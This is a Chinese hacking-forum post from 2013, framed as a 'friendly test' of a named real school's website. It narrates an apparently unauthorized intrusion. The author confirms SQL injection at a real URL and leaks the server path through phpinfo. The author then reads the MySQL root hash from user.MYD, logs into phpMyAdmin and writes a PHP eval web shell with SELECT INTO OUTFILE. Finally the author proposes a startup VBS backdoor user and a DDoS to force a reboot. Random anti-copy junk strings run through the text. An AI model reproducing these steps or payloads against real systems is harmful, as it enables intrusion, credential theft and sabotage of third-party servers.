找回密码
 立即注册
查看: 3256|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏+ G9 I7 v( M1 M: U/ ^
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
. X" N  _5 Y# a, t: ^9 X  b6 ^1 C7 T& s$ w7 X
) G" I$ A! D, r1 Z6 ]

; x9 K9 }6 E  F3 a, ]5 s1 \4 ~常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 # Z4 T# U1 k& ^. D1 Z

8 ]0 _3 K7 u: G7 i2 E% h9 }% X那么想可以直接写入shell ,getshell有几个条件:* J- f% t4 l7 S$ {. {0 f' C& I6 a
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
5 E1 X: F9 ?+ n$ g5 x  a3 \/ {( [. a1 n: `, U4 X
试着爆绝对路径:
/ j2 N0 n" }5 }) K1./phpMyAdmin/index.php?lang[]=1  9 Q6 f5 A0 r8 i9 W' m
2./phpMyAdmin/phpinfo.php  
5 Z# m  J. B- d5 z3./load_file()  
6 }% ?7 r' m' `& L4./phpmyadmin/themes/darkblue_orange/layout.inc.php  7 n( B: n& Q/ `
5./phpmyadmin/libraries/select_lang.lib.php  
8 V4 b+ f: _% F; Y2 k1 M$ b6 @6./phpmyadmin/libraries/lect_lang.lib.php  
" v% f$ ]: C$ \5 `. E7./phpmyadmin/libraries/mcrypt.lib.php   
6 U5 M4 f$ x5 B% ?8./phpmyadmin/libraries/export/xls.php  
, t, Y- J5 E( q( J1 M8 d3 r6 D' g. ], o3 z9 D
均不行...........................9 h2 X! U  h6 L( p; L
$ Q9 Y  ]3 w. b7 b+ f/ j  p
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
+ i" B% K) U# E+ Z
+ t6 w$ n/ V# T5 [9 n权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 4 s& o' i1 X1 d' Q) W% i

* y1 z2 \7 R0 u" V8 B默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败' f( R4 q8 H/ X$ f
7 W( J4 J# l+ M8 S1 u/ N( ^
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........+ }2 ?# s* G& |+ c

7 G* x/ o% K# h: X想想root还可以读,读到root密码进phpmyadmin 也可以拿shell   R4 t: }+ m$ n6 C0 h" I
0 a4 L7 @7 G1 c' C. F
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 8 m1 z9 e2 @. o% T' U

  n, ?" `  L3 j) Y) v8 ~* ~自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
8 H: Z1 n, c' n4 a- Z0 m0 R0 A+ M  Q
成功读到root密码:: D: v+ `" G" e+ o. J2 l

8 i9 `5 h3 \- d& q17---- r(0072)
& ]" H+ z/ P) }18---- o(006f)' s: r' ]7 A$ @+ Y
19---- o(006f)  C- X7 d( w& y, u7 ~" x3 W
20---- t(0074). K& ^* I/ F9 L- G% B" H/ y( c5 ?7 f; Y) g
21---- *(002a)
" P7 {, {2 y' n22---- 8(0038)* l; W: J, g7 y9 n
23---- 2(0032)
% O  h! R4 ], ^+ \/ |' Z. ]" A24---- E(0045)" |9 C5 y( C) c' M) r6 @: N/ B0 j
25---- 1(0031)
. H* G6 z) j- g+ E2 ~- [- |1 ?26---- C(0043)
' k! J0 N" r3 E+ V' f- q& T% |27---- 5(0035)
. F, N- d$ t! w) }1 ~28---- 8(0038)
, C3 Y7 p4 S) b; D/ a29---- 2(0032)1 Q4 L- [/ U3 q. G( P2 L! i
30---- 8(0038)
$ j/ X1 }1 ?& P! W$ B31---- A(0041)1 i7 J/ G* D1 M
32---- 9(0039)8 Y7 G$ ?7 k. x7 n$ o
33---- B(0042)7 |. V5 c& l$ O: P
34---- 5(0035), s# N8 S% t. H
35---- 4(0034)
5 u: \! ?; A9 L/ U# R' b8 F! C36---- 8(0038)
# V& j8 D" j- V  f1 O37---- 6(0036)
' A. q1 B6 N3 m38---- 4(0034)+ D; o3 P7 y. _# @0 b2 F0 h4 g
39---- 9(0039)
$ D2 c1 m: k* b; ^40---- 1(0031)
5 f# u# M* i9 b9 ~, l/ }6 ]. @41---- 1(0031)( H; `8 _9 _7 d, o  L
42---- 5(0035). N* M. g: n! x5 [1 o8 J7 z
43---- 3(0033)
( e9 Q" |4 Q- U% t% H44---- 5(0035)
; u+ k3 _+ O9 i: M9 `  [45---- 9(0039)
/ Y- F1 m4 e! g) ?+ o% b' h, ?46---- 8(0038)1 K  v& c5 w7 `# M8 D
47---- F(0046)2 P5 B  c/ ^- Y6 t( I0 K
48---- F(0046)# H9 j/ ]9 k! p
49---- 4(0034)8 a) d' O9 d  ?4 Q$ `! m8 c
50---- F(0046)$ M) b$ d1 i& V: J7 A
51---- 0(0030)
' v2 Y. g7 N) v5 |52---- 3(0033)
3 A. @5 t) N4 K53---- 2(0032)% e/ I4 w, f7 o3 d# V8 v
54---- A(0041)
( j1 Y& [8 |; a3 J0 w4 P7 X% j55---- 4(0034)
, `0 X$ l( g, G( o1 w56---- A(0041)
6 a4 L" w3 n8 U8 ]" G7 y57---- B(0042)
. q9 ~( c+ I$ I- W58---- *(0044)
: C1 n5 E/ s5 n6 N+ b* H* M59---- *(0035)
, p0 a' R0 V' ?" C" `, H  \3 K60---- *(0041)
7 H& k/ `" j, [" K3 E0 F) u+ n4 O# D61---- *0032); j& t0 {& E: k/ p+ Y

% [- u2 U" U5 p- |( j解密后成功登陆phpmyamin
- P; r) [6 c( y                          
- {! q7 t1 ?* l& m' L9 s6 g. l8 A- }
                             " ~2 V2 F8 p  o: Q5 ?/ Q$ u2 O. |: d
+ n% k5 G1 Z( L5 M+ W3 X( y5 I9 T( Y" e
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'3 }3 [8 X8 l  a" k4 i; W
8 ]0 J! U6 Q7 N+ T: A/ ^5 ]
成功执行,拿下shell,菜刀连接:
+ y6 Q5 g1 v+ r( B0 l1 B4 u! Y4 t/ [3 w- ~' s+ M- M; {. g
服务器不支持asp,aspx,php提权无果...................
8 Y% j, q* Y- o0 D; f7 S( k2 v7 ]  |) _! @
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:7 Y9 ~/ D+ C- }2 K( O0 Y& y6 D# w
服务器上已经有个隐藏帐号了

! _9 C' {3 i% T# G% V9 l6 I
别名     administrators
) v- {. x0 m8 I' k2 Y注释     管理员对计算机/域有不受限制的完全访问权

6 q+ U: Q* a, S- x/ z& K& i
成员
  |4 X; A3 n3 U( c6 k; n9 q
-------------------------------------------------------------------------------* k# P; P* N/ k% y4 I0 Y
admin
7 B: \  l* }$ O. @8 HAdministrator1 I3 {4 T. o8 z4 J4 s- ^8 z! Y- W
slipper$+ d8 S) M" m) e7 V# d
sqluser* G* ?' H) ^- ?- E$ O- r6 g; R! j
命令成功完成。 / I; G9 k6 f$ e

0 ^0 g; I/ @! t. d" @服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
, e* I! J; y% y. p0 c3 M8 x9 a6 [/ K) y  g) x) Y
ddos服务器重启,不然就只能坐等服务器重启了...............................
" M2 c" H0 t. t. E7 }4 w3 i* V; s) k  T! s+ F
      
7 j2 h- ]# Z+ c; @" g! n: L! |

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表